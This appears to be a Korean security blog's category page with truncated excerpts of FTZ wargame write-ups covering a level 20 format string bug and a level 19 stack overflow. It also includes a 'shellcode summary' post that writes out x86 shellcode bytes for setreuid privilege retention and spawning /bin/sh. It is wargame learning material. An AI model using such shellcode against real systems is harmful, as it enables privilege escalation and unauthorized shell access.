hacking
-
-
-
level20war game Write up/ FTZ 2018. 11. 18. 05:24
이 문제는 FTZ의 마지막 문제이기도 하고 가장 어려운 문제라고 생각한다... 이 문제의 핵심은 바로 Format String 취약점 즉, FSB 취약점을 이용한 문제인데요. 먼저 Format String이란 무엇이냐 아마 내일 올라올 포스팅을 확인 해주시면 감사하겠습니다...그 포스팅에 정리해두었거든요,,ㅎ 아직 포스팅중이라,,ㅎ헤헤헤ㅔㅔㅔ 음,, 이 사진에 다 담았는데요,,하나 하나 설명을 해보자면 위의 코드에서 format string이 터지는 이유는 printf 함수를 보시면 알 수 있습니다. printf(bleh); 라고 코딩되어 있는데요. 바로 여기서 취약점이 터지게됩니다.. 왜 터지는지는 이 후 나올 포스팅을 확인하시구요,, (이 글을 적는 시간이 새벽 3시인 관계로 너무 피곤합니다.,,) ..
-
level19war game Write up/ FTZ 2018. 11. 18. 00:12
이번 문제는 이전 문제들과 다른 문제이다. 문제의 코드를 보면 setreuid()함수가 존재하지 않는다는 것을 볼 수 있다. 즉, 직접 setreuid()를 넣어줘야 하는데 직접 쉘을 짜도 되고 아니면 에그쉘을 통해서 풀 수 있는 문제이다. 먼저 쉘 코드를 만들기 전에 gdb로 attackme를 분석해보자. 총 스택 길이는 40byte로 buf가 20byte이니 더미값은 20byte이다,그림으로 보면 이다. 이 문제는 bash drop privileges policy 을 활용한 문제인것 같다..----------------------------------------------------------------------------------RedHat 7.0 이후 버전부터 bash drop privileg..
-
쉘 코드 정리hacking/system 2018. 11. 14. 02:40
// 16 Byte, setreuid( geteuid() , geteuid() );\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80 // 25 Byte, shellcode\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80 // 41 Byte\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0..